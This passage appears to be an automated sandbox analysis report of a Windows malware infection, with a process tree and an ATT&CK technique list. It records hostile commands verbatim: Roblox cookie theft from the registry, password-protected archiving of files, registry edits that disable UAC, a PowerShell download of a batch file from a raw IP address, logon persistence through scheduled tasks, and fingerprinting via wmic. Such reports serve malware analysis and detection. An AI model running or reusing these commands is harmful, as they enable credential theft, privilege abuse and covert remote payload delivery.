        PID:5404
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:4688
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:6408
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1536"
        5⤵
        
        PID:6812
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1536
        6⤵
        Kills process with taskkill
        
        PID:6816
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1536"
        5⤵
        
        PID:6648
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1536
        6⤵
        Kills process with taskkill
        
        PID:2728
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4192"
        5⤵
        
        PID:6464
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4192
        6⤵
        Kills process with taskkill
        
        PID:7140
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        5⤵
        
        PID:5796
      - C:\Windows\system32\getmac.exe
        
        getmac
        6⤵
        
        PID:5404
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 536"
        5⤵
        
        PID:2256
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 536
        6⤵
        Kills process with taskkill
        
        PID:7068
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4192"
        5⤵
        
        PID:6916
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:6708
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4192
        6⤵
        Kills process with taskkill
        
        PID:3652
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 536"
        5⤵
        
        PID:6844
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 536
        6⤵
        Kills process with taskkill
        
        PID:5508
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2032"
        5⤵
        
        PID:6300
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:6368
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2032
        6⤵
        Kills process with taskkill
        
        PID:5772
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4372"
        5⤵
        
        PID:6028
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4372
        6⤵
        Kills process with taskkill
        
        PID:6868
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2032"
        5⤵
        
        PID:6980
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2032
        6⤵
        Kills process with taskkill
        
        PID:3884
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 376"
        5⤵
        
        PID:4444
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5188
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 376
        6⤵
        Kills process with taskkill
        
        PID:6000
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4372"
        5⤵
        
        PID:4984
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4372
        6⤵
        Kills process with taskkill
        
        PID:6532
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3628"
        5⤵
        
        PID:3140
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3628
        6⤵
        Kills process with taskkill
        
        PID:5320
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 376"
        5⤵
        
        PID:2136
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 376
        6⤵
        Kills process with taskkill
        
        PID:5368
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5544"
        5⤵
        
        PID:5364
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5544
        6⤵
        Kills process with taskkill
        
        PID:7124
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3628"
        5⤵
        
        PID:5972
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:6372
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3628
        6⤵
        Kills process with taskkill
        
        PID:5388
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5556"
        5⤵
        
        PID:6780
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5556
        6⤵
        Kills process with taskkill
        
        PID:6192
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5544"
        5⤵
        
        PID:6672
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5544
        6⤵
        Kills process with taskkill
        
        PID:4144
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        5⤵
        
        PID:1216
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:6824
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5556"
        5⤵
        
        PID:1872
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5556
        6⤵
        Kills process with taskkill
        
        PID:6952
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        5⤵
        
        PID:6124
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5148
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI60042\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\9xyp6.zip" *"
        5⤵
        
        PID:7092
      - C:\Users\Admin\AppData\Local\Temp\_MEI60042\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI60042\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\9xyp6.zip" *
        6⤵
        Executes dropped EXE
        
        PID:6992
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        5⤵
        
        PID:5404
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5796
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        6⤵
        
        PID:6624
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        5⤵
        
        PID:6428
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4688
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        6⤵
        
        PID:6620
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:5508
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:3396
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        5⤵
        
        PID:4452
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:7000
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:2568
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:2012
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        5⤵
        
        PID:5352
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3156
- - C:\Users\Admin\AppData\Local\Temp\Files\jrockekcurje.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\jrockekcurje.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:4848
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "NET framework" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\jrockekcurje.exe" /rl HIGHEST /f
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:4584
- - C:\Users\Admin\AppData\Local\Temp\Files\Rar.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Rar.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:6076
- C:\ProgramData\Synaptics\Synaptics.exe
  "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4528
- - C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
    "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
    3⤵
    - Downloads MZ/PE file
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:628
  - - C:\Users\Admin\AppData\Local\Temp\Files\NVIDIA.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\NVIDIA.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:1996
  - - C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3568
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6FA2.tmp\6FA3.tmp\6FA4.bat C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4384
      - C:\Windows\system32\mshta.exe
        
        mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE","goto :target","","runas",1)(window.close)
        6⤵
        Checks computer location settings
        Access Token Manipulation: Create Process with Token
        Suspicious use of WriteProcessMemory
        
        PID:2844
        
        C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE" goto :target
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2316
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\71E4.tmp\71E5.tmp\71E6.bat C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE goto :target"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:5056
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
        9⤵
        UAC bypass
        
        PID:3140
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
        9⤵
        UAC bypass
        
        PID:2104
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
        9⤵
        UAC bypass
        
        PID:836
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:3056
        
        C:\Windows\system32\reg.exe
        
        reg query HKEY_CLASSES_ROOT\http\shell\open\command
        10⤵
        
        PID:3172
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
        9⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:1536
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbe1e646f8,0x7ffbe1e64708,0x7ffbe1e64718
        10⤵
        
        PID:4192
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2380 /prefetch:2
        10⤵
        
        PID:536
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2448 /prefetch:3
        10⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2032
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2520 /prefetch:8
        10⤵
        
        PID:4372
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
        10⤵
        
        PID:376
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
        10⤵
        
        PID:3628
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:1
        10⤵
        
        PID:2640
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:8
        10⤵
        
        PID:3140
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:8
        10⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5208
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1
        10⤵
        
        PID:5296
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:1
        10⤵
        
        PID:5304
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1
        10⤵
        
        PID:5544
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2368,17194457146630421968,8597242707053705301,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:1
        10⤵
        
        PID:5556
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h d:\net
        9⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2260
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
        9⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:448
        
        C:\Windows\system32\schtasks.exe
        
        SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3176
  - - C:\Users\Admin\AppData\Local\Temp\Files\loader.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\loader.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:6036
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "payload.bat"
        5⤵
        
        PID:6068
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_PointingDevice get PNPDeviceID /value | find "PNPDeviceID"
        6⤵
        
        PID:5084
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_PointingDevice get PNPDeviceID /value
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4024
        
        C:\Windows\system32\find.exe
        
        find "PNPDeviceID"
        7⤵
        
        PID:4632
      - C:\Windows\system32\curl.exe
        
        curl -L -o python-installer.exe https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe --insecure --silent
        6⤵
        Downloads MZ/PE file
        
        PID:5500
      - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\python-installer.exe
        
        python-installer.exe /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4056
        
        C:\Windows\Temp\{79CADA77-5AB6-4321-9E1D-5E69CA5C2ECB}\.cr\python-installer.exe
        
        "C:\Windows\Temp\{79CADA77-5AB6-4321-9E1D-5E69CA5C2ECB}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\python-installer.exe" -burn.filehandle.attached=504 -burn.filehandle.self=556 /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:5176
        
        C:\Windows\Temp\{AAFB619C-4C23-4524-83B7-D7BA97AC7CEB}\.be\python-3.10.0rc2-amd64.exe
        
        "C:\Windows\Temp\{AAFB619C-4C23-4524-83B7-D7BA97AC7CEB}\.be\python-3.10.0rc2-amd64.exe" -q -burn.elevated BurnPipe.{B829E01E-B060-48EA-9C4E-7C09CEFD5DCE} {628768F2-F35B-48B8-A113-8B782201E304} 5176
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4240
      - C:\Windows\system32\curl.exe
        
        curl -o webpage.py -s https://rentry.co/sntwm349/raw --insecure
        6⤵
        
        PID:6672
  - - C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5320
  - - C:\Users\Admin\AppData\Local\Temp\Files\svc.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\svc.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Checks SCSI registry key(s)
      PID:2936
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 352
        5⤵
        Program crash
        
        PID:6708
  - - C:\Users\Admin\AppData\Local\Temp\Files\PrivacyPolicy.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\PrivacyPolicy.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3648
    - - C:\Users\Admin\AppData\Local\Temp\is-RP51D.tmp\PrivacyPolicy.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-RP51D.tmp\PrivacyPolicy.tmp" /SL5="$A0292,699759,54272,C:\Users\Admin\AppData\Local\Temp\Files\PrivacyPolicy.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3692
  - - C:\Users\Admin\AppData\Local\Temp\Files\BootstrapperNew.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\BootstrapperNew.exe"
      4⤵
      Executes dropped EXE
      PID:3480
  - - C:\Users\Admin\AppData\Local\Temp\Files\Autoupdate.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\Autoupdate.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:5476

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3164

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4504

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1472

C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe" -service -lunch
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5396
- C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:5408

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:6472

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
1⤵
PID:6724

C:\ProgramData\Desktop Window Manager.exe
"C:\ProgramData\Desktop Window Manager.exe"
1⤵
- Executes dropped EXE
PID:6260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2936 -ip 2936
1⤵
PID:6596

C:\ProgramData\Desktop Window Manager.exe
"C:\ProgramData\Desktop Window Manager.exe"
1⤵
- Executes dropped EXE
PID:2264

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

System Information Discovery